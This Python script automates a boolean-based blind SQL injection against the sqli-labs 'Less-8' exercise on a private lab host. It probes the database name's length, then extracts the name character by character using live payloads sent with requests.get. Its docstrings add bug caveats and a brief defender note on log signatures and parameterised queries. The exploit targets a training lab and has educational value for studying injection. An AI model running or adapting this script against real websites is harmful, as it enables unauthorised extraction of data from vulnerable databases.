import requests
import threading


# 1. SQL injection: probe the length of the database name
def databaseLen(url: str, headers: dict[str, str], normalLen: int) -> int:
    """Probe the current database name's length via a boolean-based blind injection.

    Each iteration appends ``' and length(database()) = N --+`` to *url* and
    compares the response body length with *normalLen* (the length of the
    un-injected page). An equal length is treated as "condition true", so the
    first matching N is returned as the length.

    Args:
        url: Request URL whose query string already carries the injectable parameter.
        headers: HTTP headers forwarded unchanged to ``requests.get``.
        normalLen: Body length of the baseline (un-injected) response.

    Returns:
        The first candidate length whose probe response matched *normalLen*.

    Caveats visible in the code (not changed here):
        - ``while 1`` has no upper bound; if no probe ever matches (changed
          page, blocked request, length jitter) the loop never terminates.
        - ``requests.get`` is called without ``timeout=``, so a stalled
          server blocks this function indefinitely.
        - The HTTP status code is never checked; any error page whose length
          happens to equal *normalLen* counts as a hit.
        - The local ``dbname`` holds a candidate *length*, not a name.

    Defender note: the signature here is a run of sequential requests that
    differ only by one integer and carry ``length(database())`` in the query
    string, which is what access-log review or a WAF rule keys on; on the
    server side, parameterised queries remove the underlying injection.
    """
    dbname = 1
    while 1:
        # Boolean oracle: the page is assumed to render with its baseline
        # length only when the injected condition is true.
        payload = f" ' and length(database()) = {dbname} --+"
        print(f"正在测试长度：{dbname}")  # "testing length: N"
        exp = url + payload
        response = requests.get(url=exp,headers=headers)
        if len(response.text) == normalLen:
            print(f"注入成功！数据库长度为：{dbname}")  # "injection succeeded, database length is: N"
            break
        dbname += 1
    return dbname

# 2. SQL injection: probe the database name character by character
def databaseName(url: str, headers: dict[str, str], databaseLen: int, normalLen: int) -> None:
    """Recover the database name one character at a time with the same boolean oracle.

    For each position ``i`` in ``1..databaseLen`` the probe
    ``' and ascii(substr(database(),i,1)) = C --+`` is appended to *url*, with
    ``C`` counted upward from 97 (``'a'``). A response whose body length equals
    *normalLen* is taken as a match and the character is printed.

    Args:
        url: Request URL whose query string already carries the injectable parameter.
        headers: HTTP headers forwarded unchanged to ``requests.get``.
        databaseLen: Number of characters to recover (see ``databaseLen``).
        normalLen: Body length of the baseline (un-injected) response.

    Returns:
        None. Results are only printed, never returned or collected.

    Caveats visible in the code (not changed here):
        - ``count`` starts at 97 and only increments, so any character with
          ASCII code below 97 (digits, upper-case letters, ``_``) can never
          match and the inner ``while 1`` never terminates.
        - No ``timeout=`` and no status-code check, as in ``databaseLen``.
        - Roughly 26 sequential requests per character in the common case;
          the request burst itself is the observable artefact for defenders.
    """
    for i in range(1,databaseLen + 1):
        count = 97  # ord('a'); lower-case letters only (see caveats)
        while 1:
            payload2 = f" ' and ascii(substr(database(),{i},1)) = {count} --+"
            exp2 = url + payload2
            response = requests.get(url=exp2,headers=headers)

            if len(response.text) == normalLen:
                a = chr(count)
                print(f"注入成功！数据库名称的第{i}个字母为{a}")  # "injection succeeded, character i of the database name is a"
                break
            count += 1

if __name__== "__main__":
    # Target is the sqli-labs "Less-8" exercise page on a private-range lab
    # host; the injectable parameter is ``id`` in the query string.
    url = "http://192.168.10.135/sql-lab/Less-8/?id=1"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"}
    # Baseline request: its body length is the "condition true" reference
    # that both probe functions compare against. No timeout or status check.
    response = requests.get(url=url, headers=headers)
    html = response.text
    normalLen = len(html)

    # NOTE: this assignment rebinds the module-level name ``databaseLen``
    # (the function defined above) to an int, so the function cannot be
    # called again in this process afterwards. Renaming the variable
    # (e.g. ``db_len``) would avoid the shadowing.
    databaseLen = databaseLen(url,headers,normalLen)
    databaseName(url,headers,databaseLen,normalLen)